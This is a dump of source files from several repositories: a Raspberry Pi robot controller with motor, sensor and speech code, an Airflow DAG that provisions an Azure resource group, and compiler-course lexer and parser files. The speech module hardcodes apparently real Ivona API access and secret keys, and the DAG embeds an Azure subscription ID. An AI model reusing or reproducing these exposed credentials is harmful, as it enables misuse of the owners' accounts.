"language": "Shell", "length_bytes": 76, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/start.sh", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/bin/sh\ncd /\ncd home/pi/raspie\ngit pull\ncd src\nsudo python start.py\ncd /\n\n" }, { "alpha_fraction": 0.5134261846542358, "alphanum_fraction": 0.5241173505783081, "avg_line_length": 33.22978591918945, "blob_id": "1ba4eef1e39ccadbcf84b3f31389a2c87fdb3eda", "content_id": "2e6bbbae5719146d874f7a61ff525623508ef174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8046, "license_type": "no_license", "max_line_length": 95, "num_lines": 235, "path": "/src/pymove.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport RPi.GPIO as gpio\nfrom distance import Distance\nimport pygame\nfrom pygame.locals import *\nfrom speech import Speech\nfrom multiprocessing import Process, Queue\nimport time\nimport os\nimport sys\n\n\nMOTOR_LEFT_EN1 = 7\nMOTOR_LEFT_EN2 = 11\nMOTOR_RIGHT_EN1 = 12\nMOTOR_RIGHT_EN2 = 22\nMOTOR_LEFT_UP = 13\nMOTOR_RIGHT_UP = 16\nMOTOR_LEFT_DOWN = 15\nMOTOR_RIGHT_DOWN = 18\n\ngpio.setmode(gpio.BOARD)\ngpio.setwarnings(False)\ngpio.setup(MOTOR_LEFT_EN1, gpio.OUT)\ngpio.setup(MOTOR_LEFT_EN2, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_EN1, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_EN2, gpio.OUT)\ngpio.setup(MOTOR_LEFT_UP, gpio.OUT)\ngpio.setup(MOTOR_LEFT_DOWN, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_UP, gpio.OUT)\ngpio.setup(MOTOR_RIGHT_DOWN, gpio.OUT)\n\ngpio.output(MOTOR_LEFT_EN1, True)\ngpio.output(MOTOR_LEFT_EN2, True)\ngpio.output(MOTOR_RIGHT_EN1, True)\ngpio.output(MOTOR_RIGHT_EN2, True)\n\n\nclass PyMove:\n \"\"\"\n For controlling motors by gpio raspberry and keyboard.\n \"\"\"\n def __init__(self):\n self.data = []\n pygame.init()\n self.screen = pygame.display.set_mode()\n pygame.key.set_repeat(100, 100)\n self.font = 
pygame.font.SysFont('monospace', 22)\n \n def stop_motors(self):\n self.display_text('stoping motors...')\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n gpio.output(MOTOR_RIGHT_DOWN, False) \n self.display_text('stoped!')\n\n def restart_raspie(self):\n speech = Speech()\n speech.play_sound('sounds/Very_Excited_R2D2.mp3')\n gpio.cleanup()\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\n def shutdown(self):\n self.display_text('Shutting down...')\n speech = Speech()\n speech.play_sound('sounds/Sad_R2D2.mp3')\n os.system(\"shutdown now -h\")\n\n def display_text(self, text):\n# label = self.font.render(text, 1, (255,255,0))\n# self.screen.blit(label, 100,100)\n print text\n return False\n\n def run_up_start(self):\n text = \"UP Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, True)\n gpio.output(MOTOR_RIGHT_UP, True)\n\n def run_up_stop(self):\n text = \"UP Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n\n def run_down_start(self):\n text = \"DOWN Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, True)\n gpio.output(MOTOR_RIGHT_DOWN, True)\n\n def run_down_stop(self):\n text = \"DOWN Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_DOWN, False)\n\n def run_left_start(self):\n text = \"LEFT Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, True)\n gpio.output(MOTOR_RIGHT_UP, True)\n\n def run_left_stop(self):\n text = \"LEFT Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_DOWN, False)\n gpio.output(MOTOR_RIGHT_UP, False)\n\n def run_right_start(self):\n text = \"RIGHT Start\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, True)\n gpio.output(MOTOR_RIGHT_DOWN, True)\n\n def run_right_stop(self):\n text = \"RIGHT Stop\"\n self.display_text(text)\n gpio.output(MOTOR_LEFT_UP, False)\n gpio.output(MOTOR_RIGHT_DOWN, 
False)\n \n def autopilot_process(self, q_state):\n while True:\n distance = Distance()\n cm = distance.detect()\n self.display_text('Distance:')\n self.display_text(cm)\n print int(cm)\n if int(cm) <= 30:\n self.display_text('Obstacle!')\n self.stop_motors()\n time.sleep(1)\n self.run_down_start()\n time.sleep(0.3)\n self.run_down_stop()\n time.sleep(0.3)\n self.run_right_start()\n time.sleep(0.3)\n self.run_right_stop()\n print 'end obstacle'\n else:\n self.display_text('run!')\n self.run_up_start()\n \n if not q_state.empty():\n exit = q_state.get()\n if exit == 'autopilot_stop':\n print 'autopilot stop...'\n break\n if exit == 'exit':\n print 'stoping autopilot...'\n break\n \n def key_control(self, q_state):\n q_state.put('open')\n while True:\n if not q_state.empty():\n close = q_state.get()\n if close == 'exit':\n print 'exiting key_control...'\n break\n else:\n pass\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_POWER:\n self.shutdown()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_1:\n self.display_text('Closing raspie...')\n q_state.put('exit')\n gpio.cleanup()\n time.sleep(2)\n sys.exit()\n if event.type == pygame.KEYUP and event.key == pygame.K_2:\n autopilot_process = Process(target=self.autopilot_process, args=(q_state,))\n autopilot_process.start()\n \n if event.type == pygame.KEYDOWN and event.key == pygame.K_3:\n print 'Cleaning up gpio'\n gpio.cleanup()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_4:\n text = \"Co słychać?\"\n speech = Speech()\n speech.create_voice(text)\n self.display_text(text)\n if event.type == pygame.KEYDOWN and event.key == pygame.K_5:\n text = \"Let's dance!\"\n speech = Speech()\n speech.create_voice(text)\n self.display_text(text)\n self.run_left_start()\n time.sleep(1)\n self.run_left_stop()\n self.run_right_start()\n time.sleep(1)\n self.run_right_stop()\n self.run_up_start()\n time.sleep(1)\n self.run_up_stop()\n self.run_down_start()\n 
time.sleep(1)\n self.run_down_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_UP:\n self.run_up_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_UP:\n self.run_up_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:\n self.run_down_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_DOWN:\n self.run_down_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:\n self.run_left_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_LEFT:\n self.run_left_stop()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:\n self.run_right_start()\n elif event.type == pygame.KEYUP and event.key == pygame.K_RIGHT:\n self.run_right_stop()\n\n def create_speech(self, text):\n url_speak = \"http://127.0.0.1:8000/speech?text=\" + filter_spaces(text)\n response = urllib2.urlopen(url_speak)\n text = response\n\n def start(self):\n q_state = Queue()\n key_control = Process(target=self.key_control, args=(q_state,))\n key_control.start()\n \n\nif __name__ == '__main__':\n PyMove().start()\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5661057829856873, "avg_line_length": 20.28205108642578, "blob_id": "5264e1e044a3c37232e01eed3fe7f22e89ff350b", "content_id": "1f50ca9df9b773d0ef4b92afbb657f6dc14ce138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 53, "num_lines": 39, "path": "/src/distance.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#encoding: utf-8\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\nTRIG = 31\nECHO = 32\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO, GPIO.IN)\nGPIO.output(TRIG, False)\n\nclass Distance:\n \"\"\"\n For detecting distanse.\n \"\"\"\n \n def __init__(self):\n pass\n\n def clean_gpio(self):\n GPIO.cleanup()\n \n def detect(self):\n 
time.sleep(1)\n GPIO.output(TRIG,1)\n time.sleep(0.00001)\n GPIO.output(TRIG,0)\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n while GPIO.input(ECHO) == 1:\n pulse_stop = time.time()\n distance = (pulse_stop - pulse_start) * 17150\n distance = round(distance, 2)\n return distance\n\nif __name__ == \"__main__\":\n distance = Distance()\n distance.detect()\n\n\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5789473652839661, "avg_line_length": 21.16666603088379, "blob_id": "adb958adea8ec0cea1e6ac7d0ba544b82b1267e0", "content_id": "d0df1e3f4e2aeda4d30d0e804d0ced6ba54e64f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/src/start.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/pi/raspie/src/venv/bin/python\n# -*- coding: utf-8 -*-\nimport os\n\nif __name__ == \"__main__\":\n os.system('python raspie.py')\n" }, { "alpha_fraction": 0.6835222244262695, "alphanum_fraction": 0.69398432970047, "avg_line_length": 25.090909957885742, "blob_id": "4edff7ef4a9b854576104e3028e616b8cc0ce4cd", "content_id": "798d82a9228a8a031c26bc090aaa9e347ddfa973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1147, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/src/raspie.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport multiprocessing\nimport os\nimport time\nfrom pymove import PyMove\nfrom speech import Speech\n\ndef webapi():\n os.system('venv/bin/python webapi/manage.py runserver 0.0.0.0:8000')\n\ndef move_control():\n move_control = PyMove()\n move_control.start()\n return move_control\n\ndef voice_commands():\n print \"voice_commands\"\n\ndef cam_recording():\n print \"cam_recording\"\n\ndef welcome():\n print 
\"started...\"\n speech = Speech()\n speech.play_sound('sounds/Processing_R2D2.mp3')\n\nif __name__ == '__main__':\n jobs = []\n# webapi = multiprocessing.Process(target=webapi)\n move_control = multiprocessing.Process(target=move_control)\n voice_commands = multiprocessing.Process(target=voice_commands)\n cam_recording = multiprocessing.Process(target=cam_recording)\n welcome = multiprocessing.Process(target=welcome)\n# jobs.append(webapi)\n jobs.append(move_control)\n jobs.append(voice_commands)\n jobs.append(cam_recording)\n jobs.append(welcome)\n# webapi.start()\n move_control.start()\n voice_commands.start()\n cam_recording.start()\n welcome.start()" }, { "alpha_fraction": 0.5674362182617188, "alphanum_fraction": 0.5722965002059937, "avg_line_length": 21.86111068725586, "blob_id": "acc71074665159500a43a24e31022621d28e3803", "content_id": "ee1f4d5ee94d7cc4d9f1ba84afd8eae8bf99bd74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 823, "license_type": "no_license", "max_line_length": 67, "num_lines": 36, "path": "/src/speech.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport urllib2\nfrom pygame import mixer\nimport pyvona\n\nIVONA_ACCESS_KEY = 'GDNAIKZKKGPM3SPFPZGA'\nIVONA_SECRET_KEY = 'PXnXmq3aV1qYsV4jxG4WtoVhESq4gZaXGjrDTBke'\n\nclass Speech(object):\n \"\"\"Class to making connection to voice webapi.\"\"\"\n \n def hello(self, text):\n self.create_speech(text)\n\n def filter_spaces(self, text):\n return text.replace(\" \", \"%20\")\n\n def create_voice(self, text):\n \"\"\"\"\"\"\n v = pyvona.create_voice(IVONA_ACCESS_KEY, IVONA_SECRET_KEY)\n v.voice_name = 'Jacek'\n\n try:\n v.speak(text)\n except:\n print \"Speech: connection not found!\"\n\n def play_sound(self, file):\n mixer.init()\n mixer.music.load(file)\n mixer.music.play()\n\nif __name__ == \"__main__\":\n speech = Speech()\n speech.hello('Hello World!')\n" } ]
8
rohitlaheri/Dags
https://github.com/rohitlaheri/Dags
cc0741ae9544374dbd88ccdfa6b1a7f93899a48a
1dea5d683e3f65e20c1f31dee1cedf9a773f04e1
9c8c2491ee8f7e4c81c9dceb07bc7f8b36b8f47a
refs/heads/main
2023-05-27T03:21:35.331861
2021-06-07T20:33:26
2021-06-07T20:33:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6200480461120605, "alphanum_fraction": 0.6290516257286072, "avg_line_length": 38.20000076293945, "blob_id": "6bf7508b8b954c870fbbbe7f98ec637e7dca2e07", "content_id": "f4edca0da665cef62a0f8c0200f6890b9cc75448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3332, "license_type": "no_license", "max_line_length": 124, "num_lines": 85, "path": "/rg_DAG_Test.py", "repo_name": "rohitlaheri/Dags", "src_encoding": "UTF-8", "text": "# Provision a Resource Group\n\n# Import the needed credential and management objects from the libraries.\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.identity import AzureCliCredential\nimport os\n\n#DAG Libraries\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\n\n\n# Default settings applied to all tasks\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1)\n}\n\nwith DAG('azure_container_instances',\n start_date=datetime(2021, 6, 6),\n max_active_runs=1,\n schedule_interval='@daily',\n default_args=default_args,\n catchup=False\n ) as dag:\n\n\n def create_rg():\n # Acquire a credential object using CLI-based authentication.\n credential = AzureCliCredential()\n os.environ[\"AZURE_SUBSCRIPTION_ID\"] = \"a2706439-4e8a-4934-ab98-c59ef52ce5b2\"\n # Retrieve subscription ID from environment variable.\n subscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n\n # Obtain the management object for resources.\n resource_client = ResourceManagementClient(credential, subscription_id)\n\n # Provision the resource group.\n rg_result = resource_client.resource_groups.create_or_update(\n \"PythonAzureExample-rg\",\n {\n \"location\": \"centralus\"\n }\n )\n\n # Within the ResourceManagementClient is an object named resource_groups,\n # which is of 
class ResourceGroupsOperations, which contains methods like\n # create_or_update.\n #\n # The second parameter to create_or_update here is technically a ResourceGroup\n # object. You can create the object directly using ResourceGroup(location=LOCATION)\n # or you can express the object as inline JSON as shown here. For details,\n # see Inline JSON pattern for object arguments at\n # https://docs.microsoft.com/azure/developer/python/azure-sdk-overview#inline-json-pattern-for-object-arguments.\n\n print(f\"Provisioned resource group {rg_result.name} in the {rg_result.location} region\")\n\n # The return value is another ResourceGroup object with all the details of the\n # new group. In this case the call is synchronous: the resource group has been\n # provisioned by the time the call returns.\n\n # Update the resource group with tags\n rg_result = resource_client.resource_groups.create_or_update(\n \"PythonAzureExample-rg\",\n {\n \"location\": \"centralus\",\n \"tags\": { \"environment\":\"test\", \"department\":\"tech\" }\n }\n )\n\n print(f\"Updated resource group {rg_result.name} with tags\")\n\n # Optional lines to delete the resource group. begin_delete is asynchronous.\n # poller = resource_client.resource_groups.begin_delete(rg_result.name)\n # result = poller.result()\n\n make_rg = PythonOperator(\n task_id='rg',\n python_callable=create_rg\n )\n" } ]
1
signofthefour/PPL
https://github.com/signofthefour/PPL
4c7b98c1fe7a4c64755a8cf209b447f91c62e574
c9c2cfdee10534c8ff38e395d7b9ea0e2d905cd2
7b8acd74e49a57a33994ab72d38f49948cc8a737
refs/heads/master
2023-02-08T19:00:22.305888
2021-01-05T17:47:16
2021-01-05T17:47:16
298,820,516
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.590452253818512, "alphanum_fraction": 0.6187185645103455, "avg_line_length": 38.79999923706055, "blob_id": "44ded91deb6b2fa91e156dc39fc911e07855bea4", "content_id": "dec66d8a5d2036644130f70ef554a2fe09bfd634", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1592, "license_type": "no_license", "max_line_length": 137, "num_lines": 40, "path": "/SyntaxAnalysis/src/test/LexerSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestLexer\n\nclass LexerSuite(unittest.TestCase):\n \n def test_lower_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"abc\",\"abc,<EOF>\",101))\n\n def test_lower_upper_id(self):\n self.assertTrue(TestLexer.checkLexeme(\"Var\",\"Var,<EOF>\",102))\n\n def test_escape_sequence(self):\n \"\"\"test illegal escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\\\\t def\" \"\"\",\"\"\"abc\\\\t def,<EOF>\"\"\",103))\n\n def test_real_without_e(self):\n \"\"\"test real without e\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"12.02\", \"12.02,<EOF>\", 104))\n\n def test_id_and_real(self):\n self.assertTrue(TestLexer.checkLexeme(\"abc 12 asdfjh\", \"abc,12,asdfjh,<EOF>\", 105))\n\n def test_error_token(self):\n self.assertTrue(TestLexer.checkLexeme(\"absa?sad\", \"absa,ERROR_CHAR ?\", 106))\n\n def test_sing_quote_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"abc\\\\'def\" \"\"\", \"\"\"abc\\\\'def,<EOF>\"\"\",107))\n \n def test_illegal_esc(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"abc\\\\has\" \"\"\", \"ILLEGAL_ESCAPE \\\"abc\\h\", 108))\n\n def test_double_quote_in_str(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"\"He asked me: '\"What is this?'\".\" \"\"\", \"\"\"He asked me: '\"What is this?'\".,<EOF>\"\"\",109))\n \n def test_normal_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\" \"\"\", 
\"\"\"abc,<EOF>\"\"\", 110))\n\n def test_unclose_string(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc \"\"\", \"\"\"UNCLOSE_STRING abc \"\"\", 111))\n" }, { "alpha_fraction": 0.6572287678718567, "alphanum_fraction": 0.6587321758270264, "avg_line_length": 35.29090881347656, "blob_id": "8fa0b0093c438f326291c7fc3d08ca1b3e757e3f", "content_id": "6b00b20c067aaa470d776f1e43134a52ec707a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3991, "license_type": "no_license", "max_line_length": 203, "num_lines": 110, "path": "/Assignments/assignment2/src1.1/gen_test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import os\nimport argparse\nimport sys,os\nsys.path.append('./test/')\nimport subprocess\nimport unittest\nfrom antlr4 import *\nfrom tqdm import tqdm\n\n#Make sure that ANTLR_JAR is set to antlr-4.8-complete.jar\nANTLR_JAR = os.environ.get('ANTLR_JAR')\nTARGET = '../target/main/bkit/parser' if os.name == 'posix' else os.path.normpath('../target/')\nlocpath = ['./main/bkit/parser/','./main/bkit/astgen/','./main/bkit/utils/']\nfor p in locpath:\n if not p in sys.path:\n sys.path.append(p)\n\nsys.path.append('../target/main/bkit/parser')\n\nfrom BKITLexer import BKITLexer\nfrom BKITParser import BKITParser\nfrom lexererr import *\nfrom ASTGeneration import ASTGeneration\n\nSUITE_DIR = r'./test/ASTGenSuite.py'\nTESTCASE_FOLDER_DIR = r'./test/testcases/'\nSOL_FOLDER_DIR = r'./test/solutions/'\n\nHEADER = \"\"\"\nimport unittest\nfrom TestUtils import TestAST\nfrom AST import *\n\nclass ASTGenSuite(unittest.TestCase):\n \n\"\"\"\n\ndef gen_function(inp, expect, filename):\n name = \"\\tdef test_\" + filename[:3] + \"(self):\" + '\\n'\n input_line = \"\\t\\tinput = \\\"\\\"\\\"\" + inp + \"\\\"\\\"\\\"\" + '\\n'\n expect_line = \"\\t\\texpect = \" + expect + '\\n'\n assert_line = \"\\t\\tself.assertTrue(TestAST.checkASTGen(input,expect,\" +filename[:3] + \"))\" + '\\n\\n'\n 
return name + input_line + expect_line + assert_line\n\ndef load_input(filename):\n inp = \"\"\n with open(os.path.join(TESTCASE_FOLDER_DIR, filename), 'r') as f:\n inp = ''.join(list(f))\n\n return inp\n\ndef load_expc(filename):\n expc = \"\"\n with open(os.path.join(SOL_FOLDER_DIR, filename), 'r') as f:\n expc = ''.join(list(f))\n \n return expc\n\ndef ensures_dir(directory: str):\n if len(directory) > 0 and not os.path.exists(directory):\n raise Exception(\"There is an existing dir\")\n\ndef gen_sol(testcase_dir, solution_dir):\n test_files = os.listdir(testcase_dir)\n for filename in tqdm(test_files, desc=\"Build solution\"):\n print(filename)\n inputfile = FileStream(os.path.join(testcase_dir,filename))\n dest = open(os.path.join(solution_dir, filename),\"w\")\n lexer = BKITLexer(inputfile)\n tokens = CommonTokenStream(lexer)\n parser = BKITParser(tokens)\n tree = parser.program()\n asttree = ASTGeneration().visit(tree)\n dest.write(str(asttree))\n dest.close()\n\ndef main(args):\n ensures_dir(args.testcase_dir)\n ensures_dir(args.solution_dir)\n ensures_dir(args.suite_dir)\n\n if args.gen_sol:\n gen_sol(args.testcase_dir, args.solution_dir)\n \n test_files = os.listdir(args.testcase_dir)\n sol_files = os.listdir(args.solution_dir)\n if not (len(list(test_files)) == len(list(sol_files))):\n print(\"The number of sol file and test file are not the same, check it!\".upper())\n file_str = HEADER\n try:\n for filename in tqdm(test_files):\n inp = load_input(filename)\n expc = load_expc(filename)\n \n file_str += gen_function(inp, expc, filename)\n with open(args.suite_dir, 'w') as f:\n f.write(file_str)\n except:\n print(\"An exception occurred when running gen testcase\".upper())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Expect dir for gen process.')\n parser.add_argument('--testcase_dir', type=str, default=TESTCASE_FOLDER_DIR, help=\"the testcase directory where you store the testcase in *.txt format\")\n 
parser.add_argument('--solution_dir', type=str, default=SOL_FOLDER_DIR, help=\"the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\")\n parser.add_argument('--suite_dir', type=str, default=SUITE_DIR, help=\"the testcase directory where you store the solution in *.txt format if there is no solution, please active the gen_sold\")\n parser.add_argument('--gen_sol', type=bool, default=False, help=\"active the gen solution, you need to place the AST_GEN_TEST.py in the same dir with AST.py\")\n\n args = parser.parse_args()\n main(args)" }, { "alpha_fraction": 0.635371208190918, "alphanum_fraction": 0.635371208190918, "avg_line_length": 24.22222137451172, "blob_id": "5eba9a620b05b5c101a02e0950ad37ea676976be", "content_id": "57f4c337fde4a47f8116e6d7eb344b922b1d7846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 458, "license_type": "no_license", "max_line_length": 45, "num_lines": 18, "path": "/Assignments/assignment1/src/main/bkit/parser/lexererr.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\nclass LexerError(Exception):\n pass\n\nclass ErrorToken(LexerError):\n def __init__(self,s):\n self.message = \"ERROR_CHAR \" + s\n\nclass UncloseString(LexerError):\n def __init__(self,s):\n self.message = \"UNCLOSE_STRING \"+ s\n\nclass IllegalEscape(LexerError):\n def __init__(self,s):\n self.message = \"ILLEGAL_ESCAPE \"+ s\n\nclass UnterminatedComment(LexerError):\n def __init__(self):\n self.message = \"UNTERMINATED_COMMENT\"\n\n\n\n" }, { "alpha_fraction": 0.7243150472640991, "alphanum_fraction": 0.7311643958091736, "avg_line_length": 26.85714340209961, "blob_id": "c4939c645bdc3336abe6e457c479410932b37d31", "content_id": "d956e07ec77a759ef881d8ca5892427c6bb36f7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 
81, "num_lines": 21, "path": "/LexicalAnalysis/BKITListener.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete listener for a parse tree produced by BKITParser.\nclass BKITListener(ParseTreeListener):\n\n # Enter a parse tree produced by BKITParser#program.\n def enterProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n # Exit a parse tree produced by BKITParser#program.\n def exitProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.5353535413742065, "alphanum_fraction": 0.5959596037864685, "avg_line_length": 19.789474487304688, "blob_id": "7b7115fe8176aaa32ca2a83d6cc6a2c12b88ff09", "content_id": "2b52ae868c2c1cdb948cf1064b6502a2449a001b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/FP/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\ndef double1(lst):\n return [x * 2 for x in lst]\n\ndef double2(lst):\n return [lst[0] * 2] + double2(lst[1:]) if len(lst) > 0 else []\n\ndef multiply(x, y):\n return x * y\n\ndef double3(lst, func):\n return list(map(lambda x : func(x,2), lst))\n\n# def double1(lst):\n# return list(map(lambda x: x*2, lst))\n\n\nprint(double1([1,2,3]))\nprint(double2([1,2,3]))\nprint(double3([1,2,3], multiply))\n" }, { "alpha_fraction": 0.5000239014625549, "alphanum_fraction": 0.5510364770889282, "avg_line_length": 32.94809341430664, "blob_id": "52c6e1d12b01d2c0dc265aecd042af128efbbe5b", "content_id": "71b9f27110b7799b3de284664419e718bafefb11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41872, "license_type": 
"no_license", "max_line_length": 189, "num_lines": 1233, "path": "/SyntaxAnalysis/tut/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n buf.write(\"\\u00a8\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\3\\2\\3\\2\\6\\2)\\n\\2\\r\\2\\16\\2*\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\48\\n\\4\\f\\4\\16\\4;\\13\\4\\5\\4=\\n\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5F\\n\\5\\f\\5\\16\\5I\\13\\5\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7Q\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\3\\b\")\n buf.write(\"\\3\\t\\3\\t\\3\\t\\7\\t\\\\\\n\\t\\f\\t\\16\\t_\\13\\t\\3\\t\\3\\t\\3\\n\\3\\n\")\n buf.write(\"\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\7\\13l\\n\\13\\f\\13\\16\")\n buf.write(\"\\13o\\13\\13\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\r\\5\\rx\\n\\r\\3\\16\\3\")\n buf.write(\"\\16\\3\\16\\3\\16\\3\\16\\3\\16\\7\\16\\u0080\\n\\16\\f\\16\\16\\16\\u0083\")\n buf.write(\"\\13\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u008e\\n\\17\\f\\17\\16\\17\\u0091\\13\\17\\3\\20\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u009c\\n\\21\\3\\22\\3\\22\")\n 
